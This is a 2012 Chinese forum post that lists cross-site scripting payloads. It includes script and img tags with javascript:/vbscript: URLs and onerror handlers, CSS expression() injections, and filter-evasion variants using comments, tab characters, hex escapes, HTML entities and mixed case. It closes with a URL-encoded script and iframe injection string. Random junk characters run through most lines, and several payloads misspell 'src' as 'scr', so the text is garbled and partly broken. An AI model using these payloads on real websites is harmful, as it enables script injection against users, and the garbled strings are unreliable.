<script>alert("跨站")</script> (最常用). N9 s; e1 s7 r: |
<img scr=javascript:alert("跨站")></img>- j- g4 T# o7 i8 f: I S3 t
<img scr="javascript: alert(/跨站/)></img>
$ K1 c* R3 Y( s<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
( }$ c0 h U( ^# q0 f0 k<img scr="#" onerror=alert(/跨站/)></img>8 ]% f* | i* @: D+ k# l
<img scr="#" style="xss:expression(alert(/xss/));"></img>
, O5 C# z/ g, W: g! K' p B<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
5 C, ^0 X9 N) ]2 G: Q<img src=vbscript:msgbox ("xss")></img>
& ]1 t& X( _8 _6 n: T/ O1 |1 j! ]<style> input {left:expression (alert('xss'))}</style>
! B$ [' F- p( V1 m1 w7 X<div style={left:expression (alert('xss'))}></div>$ S/ r2 I7 `6 t' |
<div style={left:exp/* */ression (alert('xss'))}></div>
z, S8 y U2 V* e3 i8 Q<div style={left:\0065\0078ression (alert('xss'))}></div>
/ j6 K8 P" c: E% i! j& Ahtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
. f! m- b* L9 c) \unicode <div style="{left:expRessioN (alert('xss'))}">8 k) |9 E7 P/ Q7 T; e6 P
8 ^ b. N7 V% y3 D
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
2 O$ J0 e) X- l3 P% s |
发表于 2012-9-13 17:15:04
收藏
支持
反对